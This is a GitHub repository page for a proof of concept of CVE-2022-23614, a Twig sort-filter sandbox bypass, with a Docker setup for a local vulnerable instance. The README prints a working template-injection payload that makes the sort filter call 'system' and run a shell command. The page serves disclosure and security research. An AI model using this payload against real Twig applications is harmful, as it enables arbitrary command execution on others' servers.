Skip to content
/ CVE-2022-23614 Public
forked from davwwwx/CVE-2022-23614

PoC for CVE-2022-23614 (Twig sort filter code execution/sandbox bypass)

0 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

AnduriCaser/CVE-2022-23614

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
config
config
 
 
example
example
 
 
images
images
 
 
.gitignore
.gitignore
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
build-docker.sh
build-docker.sh
 
 

Repository files navigation

CVE-2022-23614

PoC for CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (Twig sort filter code execution/sandbox bypass)

As seen in this commit - https://github.com/twigphp/Twig/commit/.., twig was passing user supplied function name as a callback parameter to uasort (here), thus leading to arbitrary code execution

To build and run the docker container with a vulnerable twig version

$ ./build-docker.sh

Open the webpage at localhost:1337 and try rendering the following payload

{{ ['id','']|sort('system') }}

PoC PoC

Result Result

About

PoC for CVE-2022-23614 (Twig sort filter code execution/sandbox bypass)

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • PHP 76.5%
  • Dockerfile 12.7%
  • HTML 8.2%
  • Shell 2.6%